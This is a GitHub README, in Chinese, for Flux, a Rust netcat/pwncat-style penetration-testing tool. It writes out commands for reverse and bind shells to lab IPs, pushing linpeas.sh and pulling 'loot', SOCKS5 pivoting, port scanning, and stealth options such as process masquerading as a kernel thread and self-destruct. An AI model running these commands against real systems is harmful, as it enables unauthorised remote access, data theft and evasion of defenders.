Real-Fruit-Snacks/Flux

GitHub: Real-Fruit-Snacks/Flux

一个用 Rust 编写的单文件网络工具,可替代 nc、ncat、socat 和 pwncat,支持加密通信、反弹 Shell、文件传输和内网穿透。

Stars: 0 | Forks: 0

Flux ![Rust](https://img.shields.io/badge/language-Rust-orange.svg) ![Platform](https://img.shields.io/badge/platform-Linux%20%7C%20Windows%20%7C%20macOS-lightgrey) ![License](https://img.shields.io/badge/license-MIT-blue.svg) **单文件静态二进制工具,可替代 nc、ncat、socat 和 pwncat。** 支持 TLS 和 Noise 协议的加密通道。自动 PTY Shell、文件传输(带 SHA256 验证)、SOCKS5 穿透、TCP 扫描、流量混淆和进程伪装。
## 快速开始 **前置条件:** Rust 1.70+、Cargo ``` git clone https://github.com/Real-Fruit-Snacks/Flux.git cd Flux cargo build --release ``` **验证:** ``` ./target/release/flux --version ./target/release/flux --help ``` **交叉编译以部署到目标系统:** ``` cross build --target x86_64-unknown-linux-musl --release # static Linux <1MB ``` ## 功能特性 ### 加密通道 TLS 支持自动生成自签名证书。Noise 协议支持预共享密钥。无需 PKI。 ``` flux connect 10.10.10.5 4444 --tls flux connect 10.10.10.5 4444 --encrypt --psk s3cret ``` ### 自动 PTY Shell 反弹 Shell 和绑定 Shell,在 Linux 上自动升级 PTY。无需再使用 `python -c 'import pty'`。 ``` flux shell -r 10.10.14.3 9001 # reverse shell flux shell -b 4444 # bind shell flux shell -r 10.10.14.3 9001 --tls # encrypted ``` ### 文件传输 SHA256 完整性验证、进度条支持、断点续传、zstd 压缩。 ``` flux transfer send ./linpeas.sh -t 10.10.10.5:8000 flux transfer recv -o ./loot.zip -p 8000 ``` ### 中继与穿透 端口转发、多跳链式连接、兼容 proxychains 的 SOCKS5 代理。 ``` flux relay 8080 --target-host 172.16.1.5 --target-port 80 flux relay 8080 --chain 10.10.10.5:443,172.16.1.5:3389 flux proxy 1080 ``` ### TCP 扫描 连接扫描并获取 Banner。支持 Grep 格式和 JSON 输出。 ``` flux scan 10.10.10.5 1-1000 --banner flux scan 10.10.10.5 1-65535 --grep --concurrency 200 ``` ### 隐形模式 流量混淆、进程伪装、二进制自毁、速率限制。 ``` flux connect 10.10.10.5 4444 --obfuscate # packet padding + jitter FLUX_MASQUERADE=[kworker/0:1] flux shell -r host 9001 # hide in process list flux shell -r host 9001 --rate-limit 100k # bandwidth throttle ``` ## 架构设计 ``` src/ ├── main.rs # CLI dispatch ├── modes/ # connect, shell, transfer, relay, proxy, scan ├── transport/ # TCP, UDP, TLS, Noise, obfuscation ├── io/ # Async engine, reconnect, rate limiting └── util/ # PTY, checksum, masquerade, self-destruct ``` 四层架构设计:CLI → 模式分发 → 传输层 → I/O 引擎。所有模式共享同一个基于 tokio 构建的双向异步复制引擎。功能标志控制哪些模式被编译进二进制文件。 三种构建配置:`full`(全功能,约 2MB)、`minimal`(Shell + 传输,<1MB)、`stealth`(Shell + Noise + 混淆)。 ## 平台支持 | | Linux | macOS | Windows | |---|---|---|---| | 连接 / 监听 | 完整支持 | 完整支持 | 完整支持 | | Shell | 通过 openpty 的 PTY | /bin/sh | cmd.exe | | 传输 | 完整支持 | 完整支持 | 完整支持 | | 中继 / SOCKS5 | 完整支持 | 完整支持 | 完整支持 | | 扫描 | 完整支持 | 完整支持 | 完整支持 | | 加密 | 完整支持 | 完整支持 | 完整支持 | | 伪装 | prctl | — | — | | 自毁 | 即时生效 | 即时生效 | 定时生效 | ## 安全 请通过 [GitHub Security Advisories](https://github.com/Real-Fruit-Snacks/Flux/security/advisories) 报告漏洞。90 天负责任披露周期。 **Flux 不具备以下功能:** - 管理植入物、任务分发或信标通信(非 C2 框架) - 生成载荷或漏洞利用模块(非攻击框架) - 销毁证据或篡改日志(非反取证工具) - 规避 EDR/XDR 行为分析(非规避工具) ## 许可证 [MIT]( — Copyright 2026 Real-Fruit-Snacks
标签:DNS 解析, IP 地址批量处理, Netcat替代品, Noise协议, PE 加载器, Rust, SHA256校验, SOCKS5代理, TCP扫描, TLS, 加密通信, 可视化界面, 底层编程, 文件传输, 流量混淆, 端口转发, 网络信息收集, 网络工具, 网络流量审计, 自动PTYShell, 进程伪装, 通知系统, 防御工具, 静态二进制